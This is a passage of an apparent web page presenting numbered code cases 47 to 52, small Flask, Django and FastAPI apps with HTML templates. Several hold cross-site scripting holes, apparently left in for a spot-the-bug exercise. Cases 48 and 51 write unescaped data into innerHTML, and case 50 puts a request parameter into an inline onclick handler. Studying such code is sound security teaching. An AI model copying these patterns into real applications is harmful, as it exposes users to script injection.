class="dl">"</span><span class="s2">: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msg</span><span class="p">.</span><span class="nx">text</span><span class="p">;</span> <span class="nx">chatWindow</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">div</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 47 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">products.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">results</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT name, price FROM products WHERE name LIKE ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">%</span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span><span class="p">,)</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">search.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">query</span><span class="p">),</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">results</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- search.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">trackSearch</span><span class="p">(</span><span class="nx">term</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">User searched for: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">term</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">search-label</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Showing results for: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">term</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"search-label"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for result in results %} <span class="nt">&lt;li&gt;</span>{{ result.name }} — ${{ result.price }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">trackSearch</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ query }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 48 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">news.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS articles ( id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, summary TEXT NOT NULL, author TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/article</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_article</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO articles (title, summary, author) VALUES (?, ?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">),</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">summary</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">),</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">))</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">published</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/news</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">news_feed</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">articles</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT title, summary, author FROM articles</span><span class="sh">"</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">news.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">articles</span><span class="sh">"</span><span class="p">:</span> <span class="n">articles</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- news.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">loadArticle</span><span class="p">(</span><span class="nx">title</span><span class="p">,</span> <span class="nx">summary</span><span class="p">,</span> <span class="nx">author</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">article-view</span><span class="dl">"</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;h2&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">title</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/h2&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">summary</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;small&gt;By </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">author</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/small&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>News Feed<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"article-view"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for article in articles %} <span class="nt">&lt;li</span> <span class="na">onclick=</span><span class="s">"loadArticle( {{ article.title | tojson }}, {{ article.summary | tojson }}, {{ article.author | tojson }} )"</span><span class="nt">&gt;</span>{{ article.title }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 49 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">notifications.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">notifications</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">user</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">rows</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT message FROM notifications WHERE username = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">user</span><span class="p">,)</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="n">messages</span> <span class="o">=</span> <span class="p">[</span><span class="nf">escape</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">])</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">]</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">notifications.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">messages</span><span class="sh">"</span><span class="p">:</span> <span class="n">messages</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- notifications.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Your Notifications<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for msg in messages %} <span class="nt">&lt;li&gt;</span>{{ msg }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 50 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">inventory.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS items ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL, category TEXT NOT NULL, quantity INTEGER NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/item</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_item</span><span class="p">():</span> <span class="n">name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">category</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">category</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">quantity</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">quantity</span><span class="sh">"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO items (name, category, quantity) VALUES (?, ?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">category</span><span class="p">,</span> <span class="n">quantity</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Item added.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/inventory</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">inventory</span><span class="p">():</span> <span class="n">category</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">filter</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="k">if</span> <span class="n">category</span><span class="p">:</span> <span class="n">items</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT name, category, quantity FROM items WHERE category = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">category</span><span class="p">,)</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="n">items</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT name, category, quantity FROM items</span><span class="sh">"</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">inventory.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">items</span><span class="o">=</span><span class="n">items</span><span class="p">,</span> <span class="nb">filter</span><span class="o">=</span><span class="n">category</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- inventory.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">applyFilter</span><span class="p">(</span><span class="nx">category</span><span class="p">)</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">/inventory?filter=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">category</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Inventory Dashboard<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Filtering by: {{ filter }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;button</span> <span class="na">onclick=</span><span class="s">"applyFilter('{{ filter }}')"</span><span class="nt">&gt;</span>Refresh Filter<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;table&gt;</span> <span class="nt">&lt;thead&gt;&lt;tr&gt;&lt;th&gt;</span>Name<span class="nt">&lt;/th&gt;&lt;th&gt;</span>Category<span class="nt">&lt;/th&gt;&lt;th&gt;</span>Quantity<span class="nt">&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;</span> <span class="nt">&lt;tbody&gt;</span> {% for item in items %} <span class="nt">&lt;tr&gt;</span> <span class="nt">&lt;td&gt;</span>{{ item.name }}<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;</span>{{ item.category }}<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;</span>{{ item.quantity }}<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;/tr&gt;</span> {% endfor %} <span class="nt">&lt;/tbody&gt;</span> <span class="nt">&lt;/table&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 51 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Employee Directory<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">id=</span><span class="s">"search"</span> <span class="na">placeholder=</span><span class="s">"Search by name..."</span> <span class="nt">/&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"results"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">searchInput</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">search</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">results</span><span class="dl">"</span><span class="p">);</span> <span class="nx">searchInput</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">input</span><span class="dl">"</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nx">searchInput</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/employees?q=</span><span class="p">${</span><span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">query</span><span class="p">)}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">results</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="nx">data</span><span class="p">.</span><span class="nx">employees</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">emp</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">card</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span> <span class="nx">card</span><span class="p">.</span><span class="nf">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">data-id</span><span class="dl">"</span><span class="p">,</span> <span class="nx">emp</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">card</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s2">`&lt;h3&gt;</span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">&lt;/h3&gt;`</span> <span class="o">+</span> <span class="s2">`&lt;p&gt;Role: </span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">role</span><span class="p">}</span><span class="s2">&lt;/p&gt;`</span> <span class="o">+</span> <span class="s2">`&lt;p&gt;Email: &lt;a href="mailto:</span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">email</span><span class="p">}</span><span class="s2">"&gt;</span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">email</span><span class="p">}</span><span class="s2">&lt;/a&gt;&lt;/p&gt;`</span><span class="p">;</span> <span class="nx">results</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">card</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 52 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">support.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS tickets ( id INTEGER PRIMARY KEY AUTOINCREMENT, subject TEXT NOT NULL, message TEXT NOT NULL, status TEXT NOT NULL DEFAULT </span><span class="sh">'</span><span class="s">open</span><span class="sh">'</span><span class="s"> ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/ticket</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">submit_ticket</span><span class="p">():</span> <span class="n">subject</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">subject</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">message</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO tickets (subject, message) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">subject</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Ticket submitted.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/tickets</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_tickets</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">tickets</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT id, subject, message, status FROM tickets</span><span class="sh">"</span> <span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span 